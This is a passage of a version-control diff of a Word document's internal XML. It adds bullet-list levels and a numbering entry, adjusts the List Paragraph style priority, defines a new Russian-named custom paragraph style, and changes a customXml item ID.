+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04230005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5100" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04230001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5820" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04230003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6540" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04230005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7260" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
@@ -16497,6 +16612,9 @@
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>
@@ -16698,7 +16816,7 @@
     <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
     <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
     <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:qFormat="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
     <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
     <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
     <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
@@ -17189,7 +17307,7 @@
   <w:style w:type="paragraph" w:styleId="ae">
     <w:name w:val="List Paragraph"/>
     <w:basedOn w:val="a"/>
-    <w:uiPriority w:val="99"/>
+    <w:uiPriority w:val="34"/>
     <w:qFormat/>
     <w:rsid w:val="00532646"/>
     <w:pPr>
@@ -17360,6 +17478,35 @@
       <w:sz w:val="28"/>
       <w:szCs w:val="28"/>
       <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4">
+    <w:name w:val="Стиль4"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="40"/>
+    <w:qFormat/>
+    <w:rsid w:val="005655AC"/>
+    <w:pPr>
+      <w:spacing w:line="276" w:lineRule="auto"/>
+      <w:ind w:firstLine="709"/>
+      <w:jc w:val="both"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+      <w:lang w:eastAsia="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="40">
+    <w:name w:val="Стиль4 Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="4"/>
+    <w:rsid w:val="005655AC"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -17631,7 +17778,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7C44B4BA-C48F-4A85-932C-4D84E0DAF790}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5BB95175-C1FF-41D5-B0BF-02B570AE9346}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
